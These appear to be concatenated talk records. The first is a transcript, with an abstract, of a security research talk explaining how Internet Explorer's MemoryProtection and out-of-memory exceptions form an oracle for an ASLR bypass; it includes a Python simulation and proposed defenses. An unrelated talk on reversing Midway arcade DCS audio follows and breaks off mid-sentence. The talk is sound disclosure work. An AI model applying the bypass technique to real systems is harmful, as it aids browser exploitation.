plant an integer value on the stack and then trigger the MemoryProtection reclamation routine.
If the integer that we planted corresponds to an address anywhere within the block, then memory protection will respond in one way and by keeping the block on the wait list. But if the integer we planted is not within the wait listed block, then memory protection will behave in a different way and it will deallocate the block. So it's starting to sound like we may have a way to reveal information about the layout of the address space. We can repeatedly guess an address, plant it as an integer on the stack, and get memory protection to behave in a way that reveals whether or not we have correctly guessed the address of a certain targeted block in memory. In other words, we have an oracle. Or do we? Because at this point, there's still a very big problem. Let's take a look at the programmatic contract that's exposed by memory protection. Aside from that DLL notification, which is not something that gets called during normal program operation, memory protection does not ever return even a single piece of data from any of its methods. That's a problem. We can influence memory protection based on whether we've guessed the correct address or not, but to have an oracle, we need to have the ability to read some kind of response back. And memory protection's API gives us absolutely nothing. What this means is we need a side channel. So when I was thinking about this, the first thing that came to mind was that maybe we could use a timing attack. Then something else came along. It was in the summer of 2014, and some cases started coming into ZDI that were kind of unusual. We were seeing proof of concept code that would expose bad code paths in the Internet Explorer by subjecting the browser to memory pressure. The code would do some lengthy loop doing repeated DOM manipulations and also consuming memory. And at some point when address space was nearly exhausted and memory allocations were starting to fail, a code path would be triggered that was vulnerable. It was striking how a reasonably reliable trigger could be constructed in this way, even though the browser process was under such a high level of stress. I started to think about the idea of operating the browser in a regime of high memory pressure. It's relatively unexplored territory. What kinds of things can we make happen? It struck me as interesting. Something else I noticed was that when script requests an operation that requires a heap allocation and the allocation fails due to lack of available memory, the script receives an out of memory exception. Here we have a way for attackers script to detect whether an allocation was a success or a failure. All it needs to do is check for the exception. Here's the crucial insight. Script can detect whether an allocation succeeds or fails. Whether it succeeds or fails is a function of the existing state of the heap. In other words, JavaScript out of memory exceptions are a side channel that reveals information about the state of the heap. That's exactly the side channel we need in order to get information back from memory protection. Here's the high level view of how we consult the memory protection oracle. Don't be concerned about the exact details. I'm going to get to that just a bit later. For now, let's appreciate the high level structure of what we're going to do. Say we have a block of memory on the memory protection wait list. We want to consult the oracle to determine whether a certain address, X, is an address that falls within the block. 
We plant X on the stack as an integer and then we do something that triggers the reclamation routine. In response, memory protection modifies the heap in a way that's dependent on whether X points within the targeted block. How do we find out how memory protection has responded? We attempt a heap allocation that is designed to either succeed or fail depending on what memory protection has done to the heap. Then by checking for the presence or absence of an out of memory exception, we can make a deduction about how memory protection has behaved and then this reveals the answer to whether X falls within the targeted block of memory. Here's the whole chain of deductions we make. Presence or absence of an out of memory exception tells us something about the state of the heap. The state of the heap tells us something about how memory protection behaved and how memory protection behaved tells us whether X falls within the targeted block. That's the high level view. Clearly to actualize all this, it's going to take some pretty careful setup. Here's the thing. Going back to something I mentioned earlier, once you start thinking about what you can do in a regime of high memory pressure, some really interesting possibilities open up. Before going any further though, I'd like to refine what we mean by high memory pressure. It's more subtle than just piling on lots of pressure until there's almost no memory left. First of all, it's not really available memory we're talking about. It's availability of address space. In a 32-bit process, the limiting factor that's going to cause allocation failures is not memory exhaustion, it's address space exhaustion. The next thing to note, it's possible for allocations to fail even if there's plenty of address space left. It all just depends on how large of an allocation you're asking for. Also, it's not the aggregate amount of remaining address space that matters. It's whether a large enough contiguous free region can be found. Let's refine our idea as follows. Operating the browser in a regime of limited availability of large contiguous regions of free address space. Let's play with this a little bit. Suppose we spray the heap with one megabyte allocations until all address space is consumed. Then we free one of those one megabyte blocks. What's left is a one megabyte hole. That hole is going to be the one and only contiguous region of one megabytes of free addresses. Actually, you can leave lots of smaller holes also. But it doesn't change the fact that we have exactly one hole that's one megabyte big. Now we go back and we make one more one megabyte allocation. We know it will be placed right in that hole because that's the only place it can fit. We can actually keep doing this over and over, allocating a one megabyte block and freeing it, allocating a one megabyte block and freeing it. Every single time it's going to be allocated in exactly the same place. What happened if one time we tried to make that allocation but it failed? What would that tell us? What could make that happen? One thing that could make that happen is if some other allocation went up and came around and occupied that hole. But let's say we can rule that out because we know there are no other big allocations going on. What would that tell us? We might be able to conclude that what happened was that the last time that we freed the one megabyte allocation, it never really got freed because memory protection was holding on to it. 
We have a way of telling whether the hole is free or occupied: try to make a new one-megabyte allocation and check whether an out of memory exception is thrown. Now we have all the main pieces in place to make an attack possible. First we prepare memory so there's just one large contiguous free region, let's say one megabyte in size, though it could be any size we like. We're going to call that the hole, or the region. What we're going to try to do is use memory protection as an oracle to determine where that hole is in memory. So we guess an address X, and we want to consult the oracle to determine whether X falls within the hole. First we make a one-megabyte allocation, so now the hole is occupied. Next we free that allocation, meaning it gets passed to protected free, and protected free puts the allocation on the wait list; as far as the Windows heap manager is concerned, the memory is still allocated. Then we plant X as an integer on the stack, and while X is there on the stack, we do something that triggers memory reclamation. What happens next depends on whether X falls within this one-megabyte address region or not. If X falls within the region, then when memory protection performs reclamation it will keep this allocation on the wait list and it won't free it at the heap manager level. Otherwise, if X doesn't fall within the region, memory protection will remove the allocation from the wait list and invoke heap free, which completely deallocates the block. So this shows the two possible states we can end up in: if X falls within the region, the hole stays occupied, but if X does not fall within the region, the hole gets opened up again. Last step: to tell which of these two states we just ended up in, all we need to do is make one more one-megabyte allocation. If it succeeds, we know the hole got opened, which means X wasn't within the region; but if we get an out of memory exception, we know the hole stayed occupied, which tells us that X falls within the region. Now we have an answer from the oracle, and by repeating this process with different values of X we can use the oracle to find out exactly where this one-megabyte hole is in memory. Now I'm going to come back to this idea one more time: when we operate the browser in a regime of limited availability of contiguous regions of free address space, the new possibilities that arise can be quite interesting, and that's going to lead us to what we can do next. So far what we have is a way to prepare the address space so there's just one large hole of available addresses, of a size of our choosing, and then to use the memory protection oracle to determine the exact addresses of that hole. How can we make good use of this ability? What can an attacker gain from knowing the address of a hole in the address space? We can load a module into it. We start by creating a hole that's exactly the right size for loading a particular module, then using the memory protection oracle we leak the address of the hole, and finally we cause the loading of the module. It gets loaded exactly at the beginning of the hole, because that's the only place where it's going to fit. So it's actually an ASLR bypass, and it runs really efficiently and reliably. We're going to show a demo video of what it looks like to run. This is a fully patched IE. On the demo video it's got the address already popping up. And there it is.
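Here is a small, self-contained Python simulation of that probe loop, just to make the deduction chain concrete. The hole address, the allocations, and memory protection's keep-or-free decision are all simulated; in the real attack those are the script allocations, protected free, and the stack-planting steps described above, and the MemoryError stands in for the script out of memory exception.

import random

MB = 1024 * 1024

class AddressSpaceSim:
    """The groomed address space: exactly one 1 MB region of free addresses is
    left, and memory protection keeps a queued 1 MB block alive only if a value
    planted 'on the stack' points somewhere inside it."""
    def __init__(self):
        self.hole = random.randrange(0, 0x7FF0_0000, MB)   # the secret the oracle will leak
        self.hole_free = True

    def alloc_1mb(self):
        if not self.hole_free:
            raise MemoryError("out of memory")   # the side channel visible to script
        self.hole_free = False

    def free_1mb_with_planted(self, planted_x):
        # Protected free queues the block; on reclamation it is kept if planted_x
        # points inside it, otherwise it is handed back to the heap manager.
        self.hole_free = not (self.hole <= planted_x < self.hole + MB)

def address_in_hole(sim, x):
    sim.alloc_1mb()                    # occupy the hole
    sim.free_1mb_with_planted(x)       # free it while X sits on the stack, trigger reclamation
    try:
        sim.alloc_1mb()                # success: the hole reopened, so X was not inside
    except MemoryError:
        return True                    # OOM: the hole stayed occupied, so X is inside
    sim.free_1mb_with_planted(-1)      # reopen the hole for the next probe
    return False

sim = AddressSpaceSim()
found = next(x for x in range(0, 0x7FF0_0000, MB) if address_in_hole(sim, x))
assert found == sim.hole               # the 1 MB hole's address has been leaked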
Okay, so this has been a lot of fun. It started out looking like something that was non-exploitable and turned out in the end to be a reliable ASLR bypass. The key insight that made it possible is that JavaScript out of memory exceptions are a side channel that reveals critical information about the state of the heap; I don't think that's been recognized before. There are really interesting possibilities that open up when you operate the browser under memory pressure. Okay, so we've made several recommendations to Microsoft for ways it can improve isolated heap and memory protection to harden them against the attacks we've discovered. In regard to memory protection, we've seen how in various situations the attacker can benefit from the ability to make precision modifications to the state of memory protection, and we've even shown that this leads to a breakdown of ASLR. To make memory protection resistant to attempts to normalize and control its state, we recommend removing memory protection from array and buffer allocations. This means that memory protection would apply only to scalar allocations. Our rationale is that one almost never finds an exploitable use-after-free condition in Internet Explorer where the freed object is an array or a buffer. On very rare occasions we have seen UAF cases submitted to the Zero Day Initiative where the freed object is some sort of string data, but in every case these have turned out to be non-exploitable conditions. Since UAFs of arrays and buffers in Internet Explorer are rare to non-existent, the benefit of applying memory protection to these allocations is doubtful; on the other hand, we've demonstrated how it can be a very significant benefit to an attacker. We therefore feel that memory protection will be a stronger defense if applied to scalar allocations only. Our next suggestion pertains to strengthening ASLR. Taking a look at how we got ASLR to fail, what you can notice is that the attacker was able to violate one of ASLR's assumptions by preparing the address space in a particular way. You know, Dino Dai Zovi made a similar observation when he said that thinking about security mitigations like DEP and ASLR designed for server-side code doesn't work when you give your attacker an interpreter. So I feel that ASLR needs to be strengthened for the browser, because the browser is an inherently more hostile environment. Here's the particular assumption that ASLR makes: that when it chooses a load address for a module from among the set of possible load addresses, this random choice will exhibit a significant amount of entropy. But an attacker can break this assumption by radically narrowing the set of possible load addresses before the module loads. Our recommendation is to enhance ASLR by adding an additional check before loading a module. The check is to ensure that there really do exist a multiplicity of addresses at which the requested module could load, before actually performing the random selection of a load address. If the number of possible load addresses is below a certain threshold, the module load should fail, since loading the module under that circumstance could significantly weaken the security of the entire process. Ideally this mitigation would be implemented at the kernel level, and it could be made available on an opt-in basis for executables such as browsers, which are a more hostile environment, as we mentioned.
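A sketch of that check, in Python only for brevity (the real thing would live in the kernel's module loader or in a user-land hook): enumerate the aligned base addresses at which the image could fit, and refuse the load when there are too few of them. The threshold, the alignment, and the function names here are illustrative, not anything Microsoft ships.

import random

MIN_CANDIDATES = 256            # illustrative threshold

def candidate_bases(free_regions, image_size, alignment=0x10000):
    """All aligned base addresses at which the image would fit, given a list of
    (start, size) free regions of the address space."""
    bases = []
    for start, size in free_regions:
        base = -(-start // alignment) * alignment        # round start up to the alignment
        while base + image_size <= start + size:
            bases.append(base)
            base += alignment
    return bases

def choose_load_address(free_regions, image_size):
    bases = candidate_bases(free_regions, image_size)
    if len(bases) < MIN_CANDIDATES:
        # Too few possibilities left: randomising over them is meaningless, so
        # deny the load rather than hand the attacker a predictable base.
        raise OSError("module load denied: insufficient load-address entropy")
    return random.choice(bases)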
It would also be possible to implement this mitigation in user-land code at the application level by hooking the relevant system calls. Here's a quick-site sequence diagram showing how the entropy check works. The application requests the module to be loaded. Kernel examines how many places of memory available for the module to load. Kernel decides that the minimum threshold is met and it proceeds to choose one of the possible load addresses at random, loads the module, and it returns success to the caller. While the kernel is responding to the module load request, it locks changes to the address space to prevent a time of check, time of use attack. Another time the application requests the module to be loaded. Kernel examines how many places of memory available for the module to load. This time the kernel detects that there are too few possible load addresses. The kernel denies the module load request, returns failure to the application, and it shows the locking that takes place during the second request. Next recommendation is regard to out-of-memory exceptions. We've shown that JavaScript out-of-memory exceptions are a side channel that reveals information about the state of the heap. Although this leaked bit of information might seem insignificant at first, we have a very good idea of how it can be leveraged to great effect. It should also be mentioned that out-of-memory exceptions greatly aid the attacker in setting up conditions of memory pressure that are needed for our ASLR bypass attack, as well as triggering other vulnerabilities that are dependent on memory pressure. We therefore recommend considering eliminating out-of-memory exceptions in script. When an allocation fails due to memory or address space exhaustion, instead of passing an exception up to script code where it can be handled, the condition should be considered as fatal to the process, or at least fatal to script execution within the process. This seems unlikely to have a significant negative impact upon legitimate web pages and web applications. Finally, we recommend taking ISO heap to the next logical step by creating additional separate heaps. Ideally one could have a separate heap for each scalar type. This would bring two great benefits. First, a use-after-free condition could never lead to type confusion, since every type is confined to its own heap. Secondly, since each heap consists entirely of objects of homogenous size, misalignments will not arise. Actually, this last point is made trickier by storage of C++ arrays, because C++ arrays can introduce misalignment, because when an array is stored, the individual elements don't have heap metadata added to them, the way that heap metadata is added to the individual scalar allocations, and plus the C++ compiler adds some metadata of its own to store the arrays' dimensions. It's actually possible to use C++ arrays to introduce misalignment into heaps. However, as we've mentioned, exploitable UAFs in arrays and buffers are extremely rare in Internet Explorer, so we recommend just leaving all array and buffer allocations on the default heap instead. If we do that, it should become impossible for an attacker to produce misalignments on the isolated heaps. Actually, there's another completely separate reason why it's best to leave arrays and buffers on the main process heap. I'd like to digress a moment to explain why. There's something that doesn't get much attention when iso-heap is discussed, and that's what we could be called an address-reuse attack. What's that? 
Well, consider how the isolated heap is supposed to ensure that when a DOM object is freed, an attacker won't be able to allocate some other, non-DOM object in its place, such as a string. The isolated heap tries to ensure this by making sure that DOM allocations and string allocations don't happen on the same heap. But here's the thing: the attacker doesn't care about heaps. The attacker only cares about addresses. Is it possible for the address of a freed DOM object to later on be the address of a string allocation? Well, this would become possible if, say, the isolated heap, which is the heap on which DOM objects are stored, sometimes relinquished control of virtual address space that it no longer needs. That would create the opportunity for those same addresses to later become part of a different heap, such as the process heap, and a string could be allocated there. Is this attack actually possible? Currently it is not, and here's why. The way the Windows heap manager works with small allocations is that it puts them inside regions of virtual memory called heap segments, and once a particular heap reserves a segment, it never relinquishes control of those virtual addresses. For as long as that heap lives, it's never going to allow those addresses to become part of any other heap. And today the isolated heap is used only for small scalar allocations, so it's good. But if instead IE tried to protect large buffer allocations by placing them on the isolated heap, then isolation wouldn't be guaranteed. For large allocations the heap manager doesn't use heap segments; when the heap manager freed the buffer, it would relinquish control over the virtual addresses involved, and later on those virtual addresses could become part of a different heap, breaking the isolation. So what this means for us is that it's pointless to use the Windows heap manager to try to protect buffers and arrays by placing them on an isolated heap; that isolation could be easily broken using an address-reuse attack. The bottom line is that the best approach is to keep array and buffer allocations on the default heap and have a separate isolated heap for every type of scalar allocation. Then those isolated heaps will be completely immune to type confusion and misalignment issues. So having a separate heap for every scalar type is highly beneficial, but the drawback is that it may be too wasteful of address space in a 32-bit process, where address space is a scarce resource. We're faced with a trade-off between security and address space usage. What can we do to make the best of this trade-off? We're only going to be able to create a limited number of heaps, so how can we make things as hard as possible for an attacker using only a limited number of heaps? In whatever way we assign types to heaps, an attacker who has discovered a UAF on one particular heap will try to construct an exploit via type confusion and/or misalignment by making use of the various types that we have assigned to that same heap. So let's randomize the assignments between heaps and types. We can break the monoculture of heap partitioning and instead do random partitioning at process startup time. That denies the attacker the ability to write a reliable exploit that relies on knowledge of which types are co-located on a heap, and it optimizes the defender's advantage when we make the trade-off between security and the number of heaps we're willing to create. Here's how randomized heap partitioning can function.
At process startup time, the process creates a certain configured number of heaps. This number should be chosen based on the trade-off between security and address space usage. Then it allocates an array having one element corresponding to each scalar type in the application. The initialization code populates each element of the array with a heap handle chosen at random from among the available heaps. Then, whenever application code performs a heap allocation of a particular scalar type, it just looks up the appropriate heap handle in the array and uses that heap, and the same applies to deallocation (a small sketch of this lookup scheme follows after the Q&A below). We expect that randomized heap partitioning will make exploits a lot messier, because the types needed for type confusion and/or misalignment are never guaranteed to be on the heap the attacker needs them to be on. Exploit reliability will suffer as a result. Failed exploit attempts typically result in process crashes, making attacks easier to detect, which means 0-days in the wild can be discovered and patched more quickly. Also, the attacker gains no knowledge from crashes, since a new randomization is done with every process startup. In sum, randomized heap partitioning serves to minimize the benefit the attacker can hope to attain relative to the cost of discovering UAFs and developing and fielding exploits for them. To recap the new defenses we are recommending: remove memory protection from arrays and buffers; strengthen ASLR by making a positive check for entropy in load address selection; eliminate JavaScript out of memory exceptions; create one heap per type in 64-bit processes; and use randomized heap partitioning in 32-bit processes. All right. So, just a little bit of conclusion. Of course we have many use-after-frees coming into our program, we have attacks against the isolated heap, we have attacks against memory protection, and we have an ASLR break, so why not put it all together into an exploit? We did that for the bounty submission. Not that most of us have not seen an IE exploit before, but at the time it was the latest patched IE. What you're going to see it do is run and break ASLR, it will say retry once, then it will get the load address, then exploit the use-after-free vulnerability and pop calc. We can chain this with one of the many sandbox escapes we know about in IE to do some damage. So we are releasing all of the research we did for the Microsoft bounty program; it's actually up on GitHub right now, I just checked. We've released the white paper that we submitted to Microsoft, we have proof of concepts up there for the memory protection and isolated heap stuff, and we've put up ASLR bypasses that target Windows 7, IE 11 in default configuration. We've also uploaded an ASLR bypass that works against Windows 8.1, IE 11 in default configuration, because they decided not to fix it even though we provided quite a bit of recommended defenses. So in conclusion, this research was a lot of fun. We got to come at it from the other side: we're usually the ones deciding how much to pay for vulnerabilities and exploits, and in this case we put our research up to another company to judge. It was an interesting experience, we learned a lot going through it, and I really had a good experience dealing with Microsoft. So this is where we sit today. Are there any questions? Yes? Hello. Do you have any technique for avoiding the LFH being in some indeterminate state after the user has been browsing?
This can be a little bit tricky. I don't think there's a generic way to do it; it's really bug-specific. Hey, some of those slides read patent pending. Are these mitigations encumbered by patents? Some of them are patent pending. With the way that the bounty program works, Microsoft specifically gets the rights released to them to use them all. Thanks. The memory protection technique does not apply to 64-bit processes. Any others? All right. Thank you for your time. Enjoy playing with the proof of concepts. Thank you.
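As mentioned before the Q&A, here is a short Python sketch of the randomized heap partitioning idea. In a real implementation the heaps would be created with HeapCreate and the table consulted by the allocators for each scalar type; the heap count, the type names, and everything else here are placeholders used only to show the shape of the scheme.

import random

NUM_HEAPS = 8                    # picked from the security / address-space trade-off

class Heap:
    """Stand-in for a native heap handle."""
    def __init__(self, ident):
        self.ident = ident
    def alloc(self, size):
        return (self.ident, size)          # placeholder for a real allocation

def build_partition(type_names):
    # Fresh random assignment of every scalar type to one of the heaps, done
    # once per process start-up, so crashes teach the attacker nothing reusable.
    heaps = [Heap(i) for i in range(NUM_HEAPS)]
    return {t: random.choice(heaps) for t in type_names}

TYPE_TO_HEAP = build_partition(["TypeA", "TypeB", "TypeC"])   # example type names

def alloc_object(type_name, size):
    # Allocation (and, symmetrically, deallocation) just looks up the heap
    # assigned to this type and uses it.
    return TYPE_TO_HEAP[type_name].alloc(size)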
|
In the summer of 2014, Microsoft silently introduced two new exploit mitigations into Internet Explorer with the goal of disrupting the threat landscape. These mitigations increase the complexity of successfully exploiting a use-after-free vulnerability. June's patch (MS14-035) introduced a separate heap, called Isolated Heap, which handles most of the DOM and supporting objects. July's patch (MS14-037) introduced a new strategy called MemoryProtection for freeing memory on the heap. This talk covers the evolution of the Isolated Heap and MemoryProtection mitigations, examines how they operate, and studies their weaknesses. It outlines techniques and steps an attacker must take to attack these mitigations to gain code execution on use-after-free vulnerabilities where possible. It describes how an attacker can use MemoryProtection as an oracle to determine the address at which a module will be loaded to bypass ASLR. Finally, additional recommended defenses are laid out to further harden Internet Explorer from these new attack vectors.
|
10.5446/32805 (DOI)
|
Alright, so thanks everyone for making it back after lunch. My talk is on reversing Midway arcade audio, so let's get right into it, because I've got a lot of slides. About me: IT monkey, consultant by day, hardware hacker by night, with interests in designing and reversing embedded systems, IC security failure analysis, arcade platforms, which is what this talk is about, and automotive stuff. You can contact me at xside31337 at yahoo.com. So what is DCS? DCS stands for Digital Compression System. It's a sound system developed by Williams Electronics, used in Williams pinballs, casino slot machines, and Midway coin-op arcade games. The architecture provides six channels of 16-bit audio, with independent control over the volume, looping, and playback of each of those channels. The distinction is that I'd call it six voices rather than six-channel polyphony, because it actually gets downmixed to mono or stereo or whatever the hardware supports on the particular implementation. It can play back anything from short sound effects to voiceovers to several-minute-long music tracks, which before that was unheard of; it would all have had to be tracked or composed MIDI-style as FM synthesis music. The first pinball game to use it was Indiana Jones in '93, and the first arcade game to use it was Mortal Kombat II, also in '93. There are a few variants that Williams made over the years. There's the first one, DCS-1, which is ROM-based mono and uses the ADSP-2105 with a single DAC. Then there's DCS-95, which was used for some of the pinballs. There's DCS-2 ROM-based stereo, which has a beefier DSP running two DACs, left and right channel, and then DCS-2 RAM-based stereo and RAM-based multi-channel. RAM-based meaning they moved to that architecture because a lot of the games started shipping on hard drives instead of EPROMs. The multi-channel variant can run up to six DACs for surround-sound-type deployments. And interestingly, I think IDA supports the ADSP-2181, the bottom one, though I haven't played around with it. So, a quick history of arcade audio. There have been several techniques over the years. There's analog, which was literally discrete components: amplifiers, RC networks, oscillators, things like that, to generate the sound. Then there were digital sound generator chips, so just simple Nintendo-style square, triangle, and sawtooth wave audio. We'll see if I can get a clip. Is it playing or not? Is it possible to get the audio coming out of the main speakers? Oh, there we go. So you can hear it's basically blips and bleeps, Nintendo style. Then came the FM synthesis era. An example of this was Jackal in 1986, which used Yamaha FM synthesis. So, pretty basic. That was followed by sample-based systems like OutRun, which still used the Yamaha FM synthesis but added a PCM sample IC. Then that was followed a few years later by just a fancier sample IC, for example Turtles in Time in '91. I like that one because the composition is good, even if the instruments sound terrible compared to a lot of the games out there. And then, related to this talk, here's Mortal Kombat 1, which did not use DCS; same thing, it used the Yamaha with a sampling chip. So let's have a listen. You can hear it's kind of that tinny, gross, characteristic FM synthesis sound.
After that came Super Street Fighter 2 Turbo, for example, again using Yamaha but with the QSound DSP. And then, just for reference, Street Fighter III Third Strike in '99 used a 16-channel, so 16-voice, but 8-bit sample IC, so we'll do a demo of this. You can hear the voice clips are kind of scratchy, because it's 8-bit sampling. And then finally, back to the subject of this talk, Mortal Kombat II came out in '93, and it was the first game using DCS, using the Analog Devices ADSP-2100 family. No Yamaha, no FM synthesis, just everything on the DSP. So we'll do a demo of this, and one more for good measure. The thing to notice when you're listening to the music is the drums: it's not some wavetable, like an AWE32 pulling a drum sample. This is actually composed music, done in a studio, with the mix done right, and then the master was encoded. It was done like modern music composition, basically. It's not a sequencer telling you drum hit, drum hit, bass note; it was actually composed as a complete track. And then the final kind of era is the modern PC: most arcade hardware nowadays is just x86 based, and it just has middleware libraries to do WAV, OGG, MP3, and so on. Alright, so how does DCS work, what are the fundamentals, what is it doing? You have an uncompressed WAV file or whatever source, from a DAT tape or whatever they would have been using in the 90s, encoded offline on a PC, so lots of the heavy lifting and the logic is all done in the encoder, because the decoder, while still complicated, doesn't need to do nearly what the encoder needs to do. The audio files are broken down into frames of 240 samples, and each frame is 7.68 milliseconds of audio. That's a good compromise, because if you had a really short sound you could get really tight with where you wanted the DSP engine to slice it for looping, and it gives tight control over starting up the sound. Sounds can range from one to several thousand of those 7.68-millisecond frames. Each frame is transformed from the time domain to the frequency domain by a 256-point FFT. It uses a simple cosine window with eight samples of overlap on each end, and that's simply to avoid audio artifacts like glitching sounds. The resulting spectrum is broken down into 16 subbands and then quantized according to masking curves and user control parameters. Masking curves are curves the audio engineers would tune, basically saying: I know that if there's going to be a strong note at this frequency, it's going to hide the notes underneath it, so anything underneath can effectively be discarded. The quantization levels and the resulting audio data for each frame are entropy encoded into variable-length packets, and then the packets for each audio file are combined with header blocks denoting the beginning of each frame and each sound, and those are stored as files that can be burnt into the raw EPROM images. So it's architecturally very similar to MPEG-1 Layer 1 and Layer 2, so MP1 and MP2, which is like Sony SDDS, which is like ATRAC, which is MiniDisc, and the Philips Digital Compact Cassette, which was an actual cassette tape with digital encoding instead of analog.
Whereas MP3 is more complicated, so DCS is in the MP1, MP2 range. It's got roughly a 10-to-1 compression ratio, which is actually pretty good for 1991, considering everyone else was really just doing 4-bit or 8-bit short samples on those sample IC chips. Now, my comment would be that after looking at all this, I think it would be very difficult to make an encoder. So if you wanted to make your own sounds for your old MK boards or pinballs or whatever, due to the missing masking curve logic, the entropy coding logic, and the quantizer behavior that lived in the encoder in that PC software, you could probably do it, but I would imagine the audio quality would likely be poor, because you'd be stacking a bunch of hunches and guesses about how you thought the encoder worked on top of each other, and it would probably come out terrible, is my guess. So here's the overall block diagram of what the DCS architecture looks like. You've got the actual game CPU slash GPU, which has a bidirectional I/O channel to the DSP. The DSP can access the sound ROMs, which contain program code and the actual audio data, and it has a connection to external SRAM, just because the DSP itself has very limited on-chip RAM. Then the DSP uses a serial connection to the DAC, and the DAC's voltage output goes to an op-amp, which does low-pass filtering and pre-amplification. That goes to a 20-watt audio amp, which drives a mono speaker on the earlier mono revision. Here's a little bit of the actual detail: it's a TI TMS34000-series game CPU, a regular 1-meg EEPROM, an ADSP-2100 family DSP, three 8K SRAMs, and then an AD1851 16-bit serial audio DAC. Don't worry about all the words on here; this is just the first page of the datasheet for the DSP. Some interesting things to note: this is the 2105, and there's no on-chip ROM, EEPROM, flash, or cache. It pretty much boots externally, from RAM and/or from external ROM, whatever's mapped into the address space, because it hangs all its address lines out externally and just goes from there. Some of the weird stuff about DSPs: it's a 24-bit program bus and a 16-bit data bus, because it's a Harvard architecture with separate code and data buses. There's a 40-bit multiply-and-accumulate unit, which is 16 bits by 16 bits plus 8, a 32-bit barrel shifter, and a data address generator that can do modulo, circular-style addressing, so you can easily create circular buffers in hardware, and it can also do bit reversal. So, say you have 11000; it will generate 00011, the reverse of that, which is used for a lot of DSP algorithms, including the FFT. Other than that, this particular implementation is clocked with a 10 MHz crystal, and I think that's all the relevant stuff there. So here's what the program memory map looks like. The first chunk can be mapped in from external boot memory; that's the internal program RAM. There's a chunk further up that's external program RAM, and that region is shared with the data RAM bus. And I've noticed that the DCS code really doesn't map much code; it doesn't map anything beyond this 1FFF address, so the rest is unused. And then the data memory map: the DSP has a bunch of different chunks with different wait states, configurable based on how slow or fast the external memory you hook up is, which is common. Nothing terribly crazy here; it maps in those three external SRAMs.
There is a hex-1000-word bank window, so that's a window of 0x1000 words into the physical sound EPROMs, and you use the bank select register underneath it to actually map in the next 0x1000 words. There's also the TMS CPU I/O latch that is used to receive sound commands from the game: the CPU saying play this grunt, play this scream, play this knife sound, play this background music, stop, loop, whatever. And then the DSP's got its own internal RAM near the end, followed by some system registers. Now, I probably won't go through all of this, but this is just a map of all the interesting areas the code itself uses for its own constants and things like that. The DAC play-out buffer we'll cover later. And when the TMS, the game CPU, writes to that I/O latch, it fires IRQ2 on the DSP, and that's how the DSP knows there's a new command waiting. So here's my hybrid diagram showing how the DSP actually clocks the audio data, the time-domain digital audio data, out to the DAC. It's pretty much the serial clock, the transmit frame sync, which is connected to the latch enable pin, I think. The DAC is actually double buffered, so it transfers the shift register over to the parallel register once on that LE signal, plus the data pin, and then there's just the crystal in there. A bit of trivia to note is that the DAC clock is running at 500 kHz, and 500 kHz divided by 16-bit samples gives you roughly a 32 kHz sampling rate, so this thing is running at about three-quarters of CD quality, basically. And then the output of the DAC goes to the preamp from pin 9. So the sound ROMs themselves, like I said, contain the code and the actual compressed audio. There's no encryption or obfuscation in this era; you can pretty much remove them from the PCB and dump them with a parallel EPROM programmer like your Willem, a Xeltek, or your own design, whatever you want. Nothing too crazy there. So the Wolf series of hardware from Williams, which is what MK3 runs on, uses four of these 1M-by-8-bit UV EPROMs, so one megabyte each, and four of them give you four megs total, as you can see here. With the roughly 10-to-1 compression, that would yield basically 40 megs of uncompressed audio, which is pretty good for '91, basically. And so, the organization of the sound ROMs: the bootloader, which has Stage 1 and Stage 2 code, the rest of the running program code, and miscellaneous data sit in the U2 ROM at these offsets, and I'll cover that in the next slide. That's followed by the compression dictionaries, which are basically the Huffman tables used to actually decode the variable-length data from the stream. Then come the lookup table entries, which are where the DSP first goes when it's commanded to play a sound: it needs to get a first pointer, and there's a lookup table of pointers. Those are followed by the sound headers. So that first pointer points to the sound header, and the sound header points to the frame header, because remember, a frame is 7.68 milliseconds of audio. And then finally, the other stuff in these EPROMs is the actual compressed audio itself. Later games, as I said, use IDE hard drives, and they copy the code and relevant data to DRAM. I don't know what the partitioning or file system of the hard drives looks like; all I've been looking at is the physical ROMs. So here's the U2, which is the first sound ROM.
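Before digging into the U2 layout, it is worth checking that the numbers quoted so far hang together. A few lines of Python confirm that a 500 kHz serial clock shifting 16-bit samples is 31.25 kHz (the roughly 32 kHz, three-quarters-of-CD figure), that 240 samples per frame at that rate is exactly the 7.68 ms quoted, that 240 samples plus eight samples of overlap at each end gives the 256-point transform, and that four 1 MB ROMs at about 10:1 works out to roughly 40 MB, on the order of ten minutes of uncompressed mono audio.

BIT_CLOCK_HZ = 500_000                 # serial bit clock into the AD1851 DAC
BITS_PER_SAMPLE = 16

sample_rate = BIT_CLOCK_HZ / BITS_PER_SAMPLE      # 31250.0 Hz, i.e. roughly 32 kHz
frame_ms = 240 / sample_rate * 1000               # 7.68 ms per 240-sample frame
fft_points = 240 + 2 * 8                          # 256-point FFT, 8 samples overlap each end

rom_bytes = 4 * 1024 * 1024                       # four 1 MB sound ROMs on the Wolf unit
audio_bytes = rom_bytes * 10                      # roughly 10:1 compression
minutes = audio_bytes / (sample_rate * 2) / 60    # 16-bit mono samples

print(sample_rate, frame_ms, fft_points, round(minutes, 1))   # 31250.0 7.68 256 11.2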
So, like I said, it's got all of that data at these various locations, but it's pretty much all of that stuff in the first ROM, and then right near the end is where you get the frame headers and the compressed audio. All the following ROMs will just be compressed audio, frame after frame after frame. All the code and related data stays in the first one, and the audio itself goes in the other three ROMs, or four, or five, however many the game has. The important thing to note here is that the DSP looks up a pointer at hex 4040, which contains the value 4048. It then takes the sound command from the CPU, multiplies it by three, and adds it to this 4048, and that gets you the position in this ROM of the lookup table entry, which is itself a three-byte value pointing you somewhere down into the sound header section. So as I said, the other three ROMs are just audio, pretty much. And the bank switching, like I said: there's a hex-1000-word bank window, and writing to the data memory bus at location 3000 will map in a different bank. The upper eight bits of that 16-bit word are treated modulo 4, so 0, 1, 2, 3, and if you write 4, 5, 6, 7 it's equivalent to 0, 1, 2, 3, ad nauseam, and those select the U2, U3, U4, and U5 ROMs respectively. The lower eight bits of the word select what offset to go to within the actual ROM. Here are a few examples, just showing you that a one in the upper eight bits goes to U3, a two goes to U4, a three goes to U5, and then the last two digits basically map in the offset within that physical ROM. So, quickly speeding through some of these, this is just a quick history. This is the very first one, the T unit, the board on the left, and everything on it except Mortal Kombat II came with a Yamaha FM synthesis chip. For MK2, since they had a modular ribbon cable design, they just designed a new board, with the DSP sitting right in the middle, and bolted streaming compressed audio onto the existing motherboard. This is just a close-up of that DSP board on the right. So there's the 2105, three SRAMs, and the actual sound ROMs, and there are more of them on MK2 than on MK3, but that's likely just because they're smaller EPROMs than the ones used in the later games. And there's a giant heatsink for the 20-watt power amp going to the speaker. So here's the Wolf unit, which was 